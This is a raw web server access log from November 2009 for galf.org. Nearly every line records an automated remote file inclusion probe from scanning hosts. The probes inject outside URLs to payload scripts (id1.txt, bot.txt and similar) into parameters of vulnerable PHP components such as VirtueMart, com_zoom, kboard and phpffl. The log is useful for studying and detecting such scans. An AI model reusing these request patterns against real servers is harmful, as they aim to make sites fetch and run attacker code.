81.176.226.164 - - [01/Nov/2009:20:34:25 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:34:25 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:34:25 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:34:41 -0800] "GET /logs/access_091012.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:34:41 -0800] "GET /logs/access_091012.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:35:13 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:22 -0800] "GET /logs/access_090309.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:22 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:22 -0800] "GET /logs/access_090928.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:22 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:24 -0800] "GET /logs/access_090309.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:24 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:24 -0800] "GET /logs/access_090928.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:24 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:27 -0800] "GET /logs/access_090309.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:27 -0800] "GET /logs/access_090928.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:27 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:27 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:31 -0800] "GET /logs/access_090309.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:31 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:31 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:35:31 -0800] "GET /logs/access_090928.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:34 -0800] "GET /logs/access_090309.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:34 -0800] "GET /logs/access_090928.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:34 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:34 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:39 -0800] "GET /logs/access_090309.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:39 -0800] "GET /logs/access_090928.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:39 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:36:39 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:20:36:39 -0800] "GET /logs/access_091012.log////?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:40:55 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:40:55 -0800] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:44:47 -0800] "GET /logs/access_091012.log////?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:44:47 -0800] "GET ///?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 1049 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:44:47 -0800] "GET /logs////?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 4949 "-" "libwww-perl/5.832" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:46:14 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:46:14 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:46:14 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:47:05 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:47:05 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:47:05 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:52:19 -0800] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:52:24 -0800] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:52:41 -0800] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:20:52:41 -0800] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:20:55:24 -0800] "GET /logs/access_091012.log%20%20////?DOCUMENT_ROOT=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:20:55:24 -0800] "GET ///?DOCUMENT_ROOT=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:20:55:24 -0800] "GET /logs////?DOCUMENT_ROOT=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:15 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:15 -0800] "GET /logs/access_090504.log//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:15 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.112 - - [01/Nov/2009:21:00:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:32 -0800] "GET /logs/access_090504.log//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:32 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:32 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:34 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:34 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:34 -0800] "GET /logs/access_091012.log%20%20//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:44 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:44 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:44 -0800] "GET /logs/access_091012.log%20%20//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:50 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:50 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:50 -0800] "GET /logs/access_091012.log//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:52 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:52 -0800] "GET /logs/access_091012.log//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:00:52 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:01:23 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:01:23 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:01:23 -0800] "GET /logs/access_091012.log//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:01:27 -0800] "GET /phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:01:27 -0800] "GET /logs//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:21:01:27 -0800] "GET /logs/access_091012.log//phpffl//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:21:14:07 -0800] "GET /logs/access.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.247.60.5 - - [01/Nov/2009:21:15:14 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.247.60.5 - - [01/Nov/2009:21:15:14 -0800] "GET /setup.php?setup[use_category]=1&dir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.247.60.5 - - [01/Nov/2009:21:15:14 -0800] "GET /logs/access_091005.log//setup.php?setup[use_category]=1&dir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.247.60.5 - - [01/Nov/2009:21:15:39 -0800] "GET /setup.php?setup[use_category]=1&dir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.247.60.5 - - [01/Nov/2009:21:15:39 -0800] "GET /logs/access_091005.log//setup.php?setup[use_category]=1&dir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.247.60.5 - - [01/Nov/2009:21:15:39 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:21:15:58 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:21:15:58 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:21:15:58 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.88.229.100 - - [01/Nov/2009:21:16:03 -0800] "GET /logs//?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
202.88.229.100 - - [01/Nov/2009:21:16:03 -0800] "GET /?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.88.229.100 - - [01/Nov/2009:21:16:06 -0800] "GET /logs/access.log%20%20//?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:17:17 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:17:17 -0800] "GET /logs/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:17:17 -0800] "GET /?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:17:18 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:17:18 -0800] "GET /?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:17:18 -0800] "GET /logs/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.112 - - [01/Nov/2009:21:17:37 -0800] "GET /labia/?N=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:21:18:06 -0800] "GET /logs/access.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.179 - - [01/Nov/2009:21:19:21 -0800] "GET /conf.php?setup[use_category]=1&dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:21:19:21 -0800] "GET /logs/access_091005.log//conf.php?setup[use_category]=1&dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [01/Nov/2009:21:19:21 -0800] "GET /logs//conf.php?setup[use_category]=1&dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:21:19:29 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [01/Nov/2009:21:21:38 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [01/Nov/2009:21:21:38 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [01/Nov/2009:21:21:38 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [01/Nov/2009:21:21:57 -0800] "GET /logs/access_090316.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [01/Nov/2009:21:24:33 -0800] "GET /logs/access_090907.log//skin/happycast_category_brown/setup.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [01/Nov/2009:21:24:33 -0800] "GET /skin/happycast_category_brown/setup.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [01/Nov/2009:21:24:33 -0800] "GET /logs/access.log//skin/happycast_category_brown/setup.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [01/Nov/2009:21:24:33 -0800] "GET /logs//skin/happycast_category_brown/setup.php?dir=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:24:43 -0800] "GET /logs/access_090427.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:24:53 -0800] "GET /logs/access_090504.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:25:16 -0800] "GET /logs/access_090427.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:25:16 -0800] "GET /logs/access_090504.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [01/Nov/2009:21:26:30 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [01/Nov/2009:21:26:30 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [01/Nov/2009:21:26:30 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [01/Nov/2009:21:26:34 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:26:36 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:26:56 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:27:09 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:21:27:29 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:21:27:47 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
